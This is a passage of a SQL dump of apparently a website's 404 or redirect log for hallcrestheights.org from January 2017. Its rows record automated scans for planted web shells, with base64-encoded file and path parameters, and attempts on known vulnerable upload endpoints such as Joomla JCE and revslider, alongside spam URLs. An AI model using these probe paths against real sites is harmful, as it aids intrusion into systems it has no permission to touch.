00:00:00'),(5999,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:56','0000-00-00 00:00:00'),(6000,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:57','0000-00-00 00:00:00'),(6001,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:58','0000-00-00 00:00:00'),(6002,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:59','0000-00-00 00:00:00'),(6003,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:30:00','0000-00-00 00:00:00'),(6004,'http://hallcrestheights.org//cache/list.php?z3=OHQ5QlJWLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:30:01','0000-00-00 00:00:00'),(6005,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/8t9BRV.php',NULL,'','',1,0,'2017-01-20 16:30:39','0000-00-00 00:00:00'),(6006,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/8t9BRV.php',NULL,'','',1,0,'2017-01-20 16:30:41','0000-00-00 00:00:00'),(6007,'http://hallcrestheights.org//wp-content/uploads/8t9BRV.php',NULL,'','',1,0,'2017-01-20 16:30:42','0000-00-00 00:00:00'),(6008,'http://hallcrestheights.org//8t9BRV.php',NULL,'','',1,0,'2017-01-20 16:30:44','0000-00-00 00:00:00'),(6009,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/8t9BRV.php',NULL,'','',1,0,'2017-01-20 16:30:45','0000-00-00 00:00:00'),(6010,'http://www.hallcrestheights.org/soegs-i20162635-zxyife-tvtnd-yuuh-vfcyzls-k2057-xxqroxae/',NULL,'','',5,0,'2017-01-20 19:15:51','0000-00-00 00:00:00'),(6011,'http://www.hallcrestheights.org/HH_0309.pdf',NULL,'','',7,0,'2017-01-21 07:05:27','0000-00-00 00:00:00'),(6012,'http://www.hallcrestheights.org/about/calendar.html',NULL,'','',100,0,'2017-01-21 11:43:52','0000-00-00 00:00:00'),(6013,'http://hallcrestheights.org/site-map.html',NULL,'','',40,0,'2017-01-21 13:52:13','0000-00-00 00:00:00'),(6014,'http://www.hallcrestheights.org/admin',NULL,'','',2,0,'2017-01-22 05:25:30','0000-00-00 00:00:00'),(6015,'http://hallcrestheights.org/index.php?option=com_myblog&task=ajaxupload',NULL,'','',42,0,'2017-01-22 12:21:28','0000-00-00 00:00:00'),(6016,'http://hallcrestheights.org/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',43,0,'2017-01-22 12:21:29','0000-00-00 00:00:00'),(6017,'http://www.hallcrestheights.org/xmlrpc.php?rsd',NULL,'','',23,0,'2017-01-22 12:58:50','0000-00-00 00:00:00'),(6018,'http://hallcrestheights.org/admin.php',NULL,'','',52,0,'2017-01-22 13:23:17','0000-00-00 00:00:00'),(6019,'http://hallcrestheights.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b',NULL,'','',9,0,'2017-01-22 14:57:16','0000-00-00 00:00:00'),(6020,'http://hallcrestheights.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',25,0,'2017-01-22 14:57:17','0000-00-00 00:00:00'),(6021,'http://hallcrestheights.org/images/stories/gh.php',NULL,'','',41,0,'2017-01-22 14:57:31','0000-00-00 00:00:00'),(6022,'http://hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b',NULL,'','',1,0,'2017-01-22 15:59:52','0000-00-00 00:00:00'),(6023,'http://hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',9,0,'2017-01-22 15:59:53','0000-00-00 00:00:00'),(6024,'http://hallcrestheights.org//sqlbak.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:24:11','0000-00-00 00:00:00'),(6025,'http://hallcrestheights.org//email.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:25:52','0000-00-00 00:00:00'),(6026,'http://hallcrestheights.org//functions.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:27:55','0000-00-00 00:00:00'),(6027,'http://hallcrestheights.org//cache/news.php?z3=cUhTVm05LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:27:59','0000-00-00 00:00:00'),(6028,'http://hallcrestheights.org//tmp.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-01-23 06:28:03','0000-00-00 00:00:00'),(6029,'http://hallcrestheights.org//shootme.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:28:08','0000-00-00 00:00:00'),(6030,'http://hallcrestheights.org//configurationbak.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:28:11','0000-00-00 00:00:00'),(6031,'http://hallcrestheights.org//robots.txt.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:28:14','0000-00-00 00:00:00'),(6032,'http://hallcrestheights.org//jconfig.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:28:21','0000-00-00 00:00:00'),(6033,'http://hallcrestheights.org//media/reads.php?z3=cUhTVm05LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:28:24','0000-00-00 00:00:00'),(6034,'http://hallcrestheights.org//media/1ndex.php?z3=cUhTVm05LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:28:53','0000-00-00 00:00:00'),(6035,'http://hallcrestheights.org//sql_dump.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:28:55','0000-00-00 00:00:00'),(6036,'http://hallcrestheights.org//images/laj.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:30:35','0000-00-00 00:00:00'),(6037,'http://hallcrestheights.org//media/404.php?z3=cUhTVm05LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:30:48','0000-00-00 00:00:00'),(6038,'http://hallcrestheights.org//media/tmp.php?z3=cUhTVm05LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:30:51','0000-00-00 00:00:00'),(6039,'http://hallcrestheights.org//r3x.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:30:56','0000-00-00 00:00:00'),(6040,'http://hallcrestheights.org//log.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:32:29','0000-00-00 00:00:00'),(6041,'http://hallcrestheights.org//images/stories/0day.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:32:33','0000-00-00 00:00:00'),(6042,'http://hallcrestheights.org//includes/u2p.php?z3=cUhTVm05LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:12','0000-00-00 00:00:00'),(6043,'http://hallcrestheights.org//images/xxx.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:19','0000-00-00 00:00:00'),(6044,'http://hallcrestheights.org//al277.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:23','0000-00-00 00:00:00'),(6045,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=cUhTVm05LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:27','0000-00-00 00:00:00'),(6046,'http://hallcrestheights.org//install.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:31','0000-00-00 00:00:00'),(6047,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=cUhTVm05LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:34','0000-00-00 00:00:00'),(6048,'http://hallcrestheights.org//robot.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:33:40','0000-00-00 00:00:00'),(6049,'http://hallcrestheights.org//wsdl.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:33:44','0000-00-00 00:00:00'),(6050,'http://hallcrestheights.org//goog1es.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:34:31','0000-00-00 00:00:00'),(6051,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=cUhTVm05LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:34:35','0000-00-00 00:00:00'),(6052,'http://hallcrestheights.org//update.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:34:41','0000-00-00 00:00:00'),(6053,'http://hallcrestheights.org//includes.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:34:44','0000-00-00 00:00:00'),(6054,'http://hallcrestheights.org//wp-main.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:34:50','0000-00-00 00:00:00'),(6055,'http://hallcrestheights.org//news.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:34:55','0000-00-00 00:00:00'),(6056,'http://hallcrestheights.org//images/al277.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:35:40','0000-00-00 00:00:00'),(6057,'http://hallcrestheights.org//webconfig.txt.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:35:41','0000-00-00 00:00:00'),(6058,'http://hallcrestheights.org//cache/cachee.php?z3=cUhTVm05LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:35:47','0000-00-00 00:00:00'),(6059,'http://hallcrestheights.org//thumb.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:35:52','0000-00-00 00:00:00'),(6060,'http://hallcrestheights.org//SessionController.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:36:01','0000-00-00 00:00:00'),(6061,'http://hallcrestheights.org//maill.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:36:37','0000-00-00 00:00:00'),(6062,'http://hallcrestheights.org//error-log.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:36:45','0000-00-00 00:00:00'),(6063,'http://hallcrestheights.org//authenticating.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:36:49','0000-00-00 00:00:00'),(6064,'http://hallcrestheights.org//google-assist.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:36:54','0000-00-00 00:00:00'),(6065,'http://hallcrestheights.org//images/google-assist.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:36:59','0000-00-00 00:00:00'),(6066,'http://hallcrestheights.org//images/robots.txt.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:02','0000-00-00 00:00:00'),(6067,'http://hallcrestheights.org//elements.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:06','0000-00-00 00:00:00'),(6068,'http://hallcrestheights.org//xmlsrpc.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:11','0000-00-00 00:00:00'),(6069,'http://hallcrestheights.org//wp-cache.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:15','0000-00-00 00:00:00'),(6070,'http://hallcrestheights.org//images/404.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:19','0000-00-00 00:00:00'),(6071,'http://hallcrestheights.org//images/head.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:23','0000-00-00 00:00:00'),(6072,'http://hallcrestheights.org//cache/support.php?z3=cUhTVm05LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:25','0000-00-00 00:00:00'),(6073,'http://hallcrestheights.org//RoseLeif.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:33','0000-00-00 00:00:00'),(6074,'http://hallcrestheights.org//Abbrevsprl.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:37','0000-00-00 00:00:00'),(6075,'http://hallcrestheights.org//show.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:43','0000-00-00 00:00:00'),(6076,'http://hallcrestheights.org//images/defau1t.php?z3=cUhTVm05LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:47','0000-00-00 00:00:00'),(6077,'http://hallcrestheights.org//cli/40dd1d.php?z3=cUhTVm05LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:37:51','0000-00-00 00:00:00'),(6078,'http://hallcrestheights.org//infos.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:38:03','0000-00-00 00:00:00'),(6079,'http://hallcrestheights.org//cache/defau1t.php?z3=cUhTVm05LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:38:06','0000-00-00 00:00:00'),(6080,'http://hallcrestheights.org//bookmark.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:38:10','0000-00-00 00:00:00'),(6081,'http://hallcrestheights.org//configbak.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:38:17','0000-00-00 00:00:00'),(6082,'http://hallcrestheights.org//wp-data.php?z3=cUhTVm05LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:38:20','0000-00-00 00:00:00'),(6083,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:38:24','0000-00-00 00:00:00'),(6084,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:38:28','0000-00-00 00:00:00'),(6085,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:39:25','0000-00-00 00:00:00'),(6086,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-01-23 06:39:29','0000-00-00 00:00:00'),(6087,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:40:10','0000-00-00 00:00:00'),(6088,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:40:13','0000-00-00 00:00:00'),(6089,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:40:33','0000-00-00 00:00:00'),(6090,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:40:37','0000-00-00 00:00:00'),(6091,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:40:42','0000-00-00 00:00:00'),(6092,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=cUhTVm05LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:42:23','0000-00-00 00:00:00'),(6093,'http://hallcrestheights.org//cache/list.php?z3=cUhTVm05LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-23 06:42:42','0000-00-00 00:00:00'),(6094,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/qHSVm9.php',NULL,'','',1,0,'2017-01-23 06:54:41','0000-00-00 00:00:00'),(6095,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/qHSVm9.php',NULL,'','',1,0,'2017-01-23 06:57:23','0000-00-00 00:00:00'),(6096,'http://hallcrestheights.org//wp-content/uploads/qHSVm9.php',NULL,'','',1,0,'2017-01-23 06:58:21','0000-00-00 00:00:00'),(6097,'http://hallcrestheights.org//qHSVm9.php',NULL,'','',1,0,'2017-01-23 06:59:06','0000-00-00 00:00:00'),(6098,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/qHSVm9.php',NULL,'','',1,0,'2017-01-23 06:59:58','0000-00-00 00:00:00'),(6099,'http://hallcrestheights.org/libraries/joomla/juser.php?u',NULL,'','',3,0,'2017-01-23 12:23:16','0000-00-00 00:00:00'),(6100,'http://www.hallcrestheights.org/qlbow-k1457-ciggec-eayaf-i20162635-xrgl/',NULL,'','',4,0,'2017-01-23 16:25:00','0000-00-00 00:00:00'),(6101,'http://www.hallcrestheights.org/i20162635-bsoap-azapst-k1357-asgmh-cqcm-ckfrdtf/',NULL,'','',9,0,'2017-01-23 17:52:52','0000-00-00 00:00:00'),(6102,'http://www.hallcrestheights.org/upttm-k17164-nbea-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',14,0,'2017-01-23 19:37:06','0000-00-00 00:00:00'),(6103,'http://www.hallcrestheights.org/k8640-pcscqruf-unpkw-xpoideot-wtvsoar-i20162628-mosm-gepla-lheliy-rqiy.htm',NULL,'','',6,0,'2017-01-23 20:46:52','0000-00-00 00:00:00'),(6104,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-i20162635-sxpp-k26300-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',6,0,'2017-01-23 22:05:19','0000-00-00 00:00:00'),(6105,'http://www.hallcrestheights.org/i20162635-k5650-pcscqruf-unpkw/xpoideot-wtvsoar-mosm.htm',NULL,'','',9,0,'2017-01-23 22:16:22','0000-00-00 00:00:00'),(6106,'http://www.hallcrestheights.org/about/eco.html',NULL,'','',4,0,'2017-01-23 22:16:52','0000-00-00 00:00:00'),(6107,'http://www.hallcrestheights.org/membership/index.html',NULL,'','',4,0,'2017-01-23 22:19:15','0000-00-00 00:00:00'),(6108,'http://www.hallcrestheights.org/soegs-zxyife-k43657-tvtnd-yuuh-i20162634-vfcyzls/',NULL,'','',4,0,'2017-01-23 22:20:42','0000-00-00 00:00:00'),(6109,'http://www.hallcrestheights.org/xhajv-qlwczb-i20162634-iqsos-qxoq-kgqaqyd-cptznzvt-k43357-jqoevpca/',NULL,'','',4,0,'2017-01-23 22:22:37','0000-00-00 00:00:00'),(6110,'http://www.hallcrestheights.org/pages/itexpo2016.html',NULL,'','',4,0,'2017-01-23 22:23:35','0000-00-00 00:00:00'),(6111,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil/i20162635-uourxiv-k15250-lbtr-hnnmt-qzkowt.htm',NULL,'','',3,0,'2017-01-23 22:25:02','0000-00-00 00:00:00'),(6112,'http://www.hallcrestheights.org/gnfznxvj-k26200-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-i20162635-vlxt-dqkunfgl.htm',NULL,'','',6,0,'2017-01-23 22:25:30','0000-00-00 00:00:00'),(6113,'http://www.hallcrestheights.org/k22832-uptt-mnbeatg-i20162630-rbnqc-dcncxr.htm',NULL,'','',4,0,'2017-01-23 22:29:51','0000-00-00 00:00:00'),(6114,'http://www.hallcrestheights.org/about/number.html',NULL,'','',6,0,'2017-01-23 22:30:49','0000-00-00 00:00:00'),(6115,'http://www.hallcrestheights.org/k6164-edzvd-i20162633-lqco-mnnm-mcawvbfu.htm',NULL,'','',5,0,'2017-01-23 22:31:46','0000-00-00 00:00:00'),(6116,'http://www.hallcrestheights.org/oiyi-i20162629-k16505-zgolrcm-wfbsnop-dgfnh/',NULL,'','',6,0,'2017-01-23 22:34:39','0000-00-00 00:00:00'),(6117,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-i20162635-vuclzup-k26100-hvqa-wuoxz-mnpzvs-gcrl.htm',NULL,'','',4,0,'2017-01-23 22:36:35','0000-00-00 00:00:00'),(6118,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-i20162635-tpmh-k5600-prbikzon-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',6,0,'2017-01-23 22:38:03','0000-00-00 00:00:00'),(6119,'http://www.hallcrestheights.org/k39805-kzpf-fmsxklr-dedhwge-fvbbg-i20162629-zagpe/',NULL,'http://www.google.com/search','',7,0,'2017-01-23 23:43:20','0000-00-00 00:00:00'),(6120,'http://www.hallcrestheights.org/k16064-dvisc-i20162633-iwbv-wkux-krbzomsm.htm',NULL,'','',4,0,'2017-01-24 00:03:13','0000-00-00 00:00:00'),(6121,'http://www.hallcrestheights.org/ryvhr-hmqt/k16214-yysl-lgeajanp-dmefnxhq-i20162633-fhjdyh.htm',NULL,'','',5,0,'2017-01-24 00:34:58','0000-00-00 00:00:00'),(6122,'http://www.hallcrestheights.org/ajqxxu-i20162629-k25649-cuzaofif-ephi-ijimj/',NULL,'','',12,0,'2017-01-24 01:13:58','0000-00-00 00:00:00'),(6123,'http://www.hallcrestheights.org/ajqxx-ucuzao-k42757-fifep-hiij-i20162634-imjnjbo/',NULL,'','',4,0,'2017-01-24 02:12:27','0000-00-00 00:00:00'),(6124,'http://www.hallcrestheights.org/k6000-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-i20162635-ogywb-iwyrur-fgvf-cwqzhrib-nknyfeeb.htm',NULL,'','',5,0,'2017-01-24 02:13:55','0000-00-00 00:00:00'),(6125,'http://hallcrestheights.org/i20162628-edzvdl-k25066-qcomnn-mmcawv-bfuj/apyvrl-flxhqj-kuhkc-mumbhmg-znkohey.htm',NULL,'','',2,0,'2017-01-24 20:06:08','0000-00-00 00:00:00'),(6126,'http://www.hallcrestheights.org/wbwpb-k42857-onkydh-i20162634-xjjik-vfvt/',NULL,'','',7,0,'2017-01-24 20:56:23','0000-00-00 00:00:00'),(6127,'http://hallcrestheights.org/lugdlt-rsmxxh-ypzqjl/i20162628-lzoh-njumnt-ecwfog-k46066-ywbiw.htm',NULL,'','',3,0,'2017-01-25 13:56:57','0000-00-00 00:00:00'),(6128,'http://www.hallcrestheights.org/site-map.html',NULL,'','',39,0,'2017-01-25 17:29:55','0000-00-00 00:00:00'),(6129,'http://hallcrestheights.org/i20162628-edzvdl-qcomnn-k45866-mmcawv-bfuj/apyvrl-flxhqj-kuhkc-mumbhmg-znkohey-rupxpu-dzikmus-sheq.htm',NULL,'','',4,0,'2017-01-25 18:38:59','0000-00-00 00:00:00'),(6130,'http://www.hallcrestheights.org/i20162632-tkuykf-k60389-jdnjjbuc-yupa-jaylr/',NULL,'','',12,0,'2017-01-25 20:28:55','0000-00-00 00:00:00'),(6131,'http://www.hallcrestheights.org/k728-fadlajf-i20162633-nlgfpcvw-gmyhdecw-xbdeudk.htm',NULL,'','',2,0,'2017-01-26 17:11:13','0000-00-00 00:00:00'),(6132,'http://www.hallcrestheights.org/useful/index.html',NULL,'','',10,0,'2017-01-26 17:42:35','0000-00-00 00:00:00'),(6133,'http://www.hallcrestheights.org/news/index.html',NULL,'','',9,0,'2017-01-26 17:43:42','0000-00-00 00:00:00'),(6134,'http://www.hallcrestheights.org/pcscqru-funpkwxp-oideotwt-i20162633-vsoarmo-smgepl-alhel-iyrqiyqf-ufxv-k528-ugowop-egtq.htm',NULL,'','',6,0,'2017-01-27 03:22:55','0000-00-00 00:00:00'),(6135,'http://www.hallcrestheights.org/k16100-mrcqgbei-fuwgr-abtnwyrq-i20162635-semgwko.htm',NULL,'','',6,0,'2017-01-27 05:44:39','0000-00-00 00:00:00'),(6136,'http://www.hallcrestheights.org/hh-brochure.pdf',NULL,'','',26,0,'2017-01-27 07:41:28','0000-00-00 00:00:00'),(6137,'http://hallcrestheights.org/i20162628-mrcqgb-k45766-eifuwg-rabtnw-yrqs/emgwko-whmemx-gkucy-bnpzkic-vejxkul.htm',NULL,'','',1,0,'2017-01-28 00:20:19','0000-00-00 00:00:00'),(6138,'http://hallcrestheights.org/pcscqr-k46366-ufunpk/wxpoid-i20162628-eotw-tvsoar.htm',NULL,'','',4,0,'2017-01-28 00:39:38','0000-00-00 00:00:00'),(6139,'http://hallcrestheights.org/i20162628-zmkued-k25516-tzjivy-oqxifg-xuhx-ptvuhm-iwnzko-rpvub-fgnqtpm-hprbikz.htm',NULL,'','',2,0,'2017-01-28 05:41:38','0000-00-00 00:00:00'),(6140,'http://hallcrestheights.org/ryvhrh-k46816-mqtyys-llgeaj-i20162628-anpd-mefnxh.htm',NULL,'','',2,0,'2017-01-28 18:27:35','0000-00-00 00:00:00'),(6141,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-i20162635-japyvrl-k5800-flxh-qjkuh-kcmumb.htm',NULL,'','',8,0,'2017-01-28 18:38:45','0000-00-00 00:00:00'),(6142,'http://hallcrestheights.org/upttmn-k25666-beatgr/bnqcdc-i20162628-ncxr-dhcpgz.htm',NULL,'','',1,0,'2017-01-28 21:19:15','0000-00-00 00:00:00'),(6143,'http://hallcrestheights.org/i20162628-mrcqgb-eifuwg-rabtnw-yrqs-emgwko-whmemx-gkucy-bnpzkic-k25616-vejxkul-zjcjkn-tsxjlnu-uuvt.htm',NULL,'','',3,0,'2017-01-28 21:44:01','0000-00-00 00:00:00'),(6144,'http://hallcrestheights.org/k24816-jgletk-ymdrqz-i20162628-nrvmlk-swaz-vkecqq-neeiaq-jzlnp-lqfcneb-xilnvox-bdjvee-bikptjv.htm',NULL,'','',3,0,'2017-01-28 23:45:02','0000-00-00 00:00:00'),(6145,'http://hallcrestheights.org/pcscqr-ufunpk-wxpoid-i20162628-k24916-eotw-tvsoar-mosmge-plalh.htm',NULL,'','',1,0,'2017-01-29 02:12:58','0000-00-00 